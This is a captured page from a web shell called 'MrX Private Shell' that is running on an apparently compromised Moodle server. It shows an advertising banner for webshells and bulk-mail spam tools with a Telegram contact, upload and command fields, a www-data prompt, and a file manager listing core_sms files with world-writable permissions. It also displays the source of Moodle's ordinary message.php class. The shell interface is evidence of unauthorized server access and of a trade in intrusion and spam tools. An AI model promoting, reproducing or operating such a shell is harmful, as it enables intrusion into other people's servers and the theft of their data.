__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

namespace core_sms;

use libphonenumber\NumberParseException;
use Spatie\Cloneable\Cloneable;
use ValueError;

/**
 * A Message used in an SMS.
 *
 * Note: This class is immutable. All properties are readonly.
 *       The class itself will likely become readonly when PHP 8.2 is the minimum requirement.
 *
 * @package    core_sms
 * @copyright  2024 Andrew Lyons <andrew@nicols.co.uk>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 * @property-read int $timecreated The time that the message was created
 * @property-read string $recipientnumber The recipient of the message
 * @property-read null|string $content The content of the message
 * @property-read string $component The component that owns the message
 * @property-read string $messagetype The type of message within the component
 * @property-read int|null $recipientuserid The user id of the recipient if one exists
 * @property-read bool $issensitive Whether this message contains sensitive information
 * @property-read int|null $id The id of the message in the database
 * @property-read message_status $status The status of the message
 * @property-read int|null $gatewayid The id of the gateway that sent the message
 */
class message {
    use Cloneable {
        with as private _with;
    }

    /** @var int The time that the message was created */
    public readonly int $timecreated;

    /**
     * Create a new message.
     *
     * @param string $recipientnumber The phone number of the message recipient
     * @param null|string $content The content of the message
     * @param string $component The component that owns the message
     * @param string $messagetype The type of message within the component
     * @param int|null $recipientuserid The user id of the recipient if one exists
     * @param bool $issensitive Whether this message contains sensitive information
     * @param int|null $id The id of the message in the database
     * @param message_status $status The status of the message
     * @param int|null $gatewayid The id of the gateway that sent the message
     * @param int|null $timecreated The time that the message was created
     */
    public function __construct(
        /** @var string The phone number of the message recipient */
        public readonly string $recipientnumber,
        /** @var null|string The content of the message */
        public readonly ?string $content,
        /** @var string The component that owns the message */
        public readonly string $component,
        /** @var string The type of message within the component */
        public readonly string $messagetype,
        /** @var int|null The user id of the recipient if one exists */
        public readonly ?int $recipientuserid,
        /** @var bool Whether this message contains sensitive information */
        public readonly bool $issensitive,
        /** @var null|int The id of the message in the database */
        public readonly ?int $id = null,
        /** @var message_status The status of the message */
        public readonly message_status $status = message_status::UNKNOWN,
        /** @var null|int The id of the gateway that sent the message */
        public readonly ?int $gatewayid = null,
        ?int $timecreated = null,
    ) {
        if ($timecreated === null) {
            $this->timecreated = \core\di::get(\core\clock::class)->now()->getTimestamp();
        } else {
            $this->timecreated = $timecreated;
        }
    }

    /**
     * Convert the message to a record.
     *
     * @return \stdClass
     */
    public function to_record(): \stdClass {
        $record = (object) [
            'recipientnumber' => $this->recipientnumber,
            'content' => $this->content,
            'component' => $this->component,
            'messagetype' => $this->messagetype,
            'recipientuserid' => $this->recipientuserid,
            'issensitive' => $this->issensitive,
            'status' => $this->status->value,
            'gatewayid' => $this->gatewayid,
            'timecreated' => $this->timecreated,
        ];

        if ($this->id !== null) {
            $record->id = $this->id;
        }

        return $record;
    }

    /**
     * Update the message properties.
     *
     * Note: The message is immutable.
     * When setting the status a new object will be returned.
     *
     * @param mixed ...$args
     * @return message
     */
    public function with(...$args): self {
        if (isset($this->id) && array_key_exists('id', $args)) {
            throw new \coding_exception('Message already has an id');
        }

        return $this->_with(...$args);
    }

    /**
     * Get the region code for this messages.
     *
     * @return null|string
     */
    public function get_region(): ?string {
        $pnu = \core\di::get(\libphonenumber\PhoneNumberUtil::class);
        try {
            $recipient = $pnu->parse($this->recipientnumber);
        } catch (NumberParseException $e) {
            // Note: Throw errors which are not specific to libphonenumber here.
            // This is to avoid hard-trying use of this library.
            throw new ValueError(
                new \lang_string('phonenumbernotvalid', 'sms', ['message' => $e->getMessage()]),
                $e->getCode(),
                $e,
            );
        }

        return $pnu->getRegionCodeForNumber($recipient);
    }

    /**
     * Check if the message has been sent.
     *
     * @return bool
     */
    public function is_sent(): bool {
        return $this->status->is_sent();
    }
}

Filemanager

Name Type Size Permission Actions
external Folder 0777
form Folder 0777
hook Folder 0777
privacy Folder 0777
table Folder 0777
description.php File 985 B 0777
gateway.php File 4.02 KB 0777
manager.php File 13.39 KB 0777
message.php File 6.14 KB 0777
message_status.php File 2.88 KB 0777
status.php File 1.64 KB 0777
Filemanager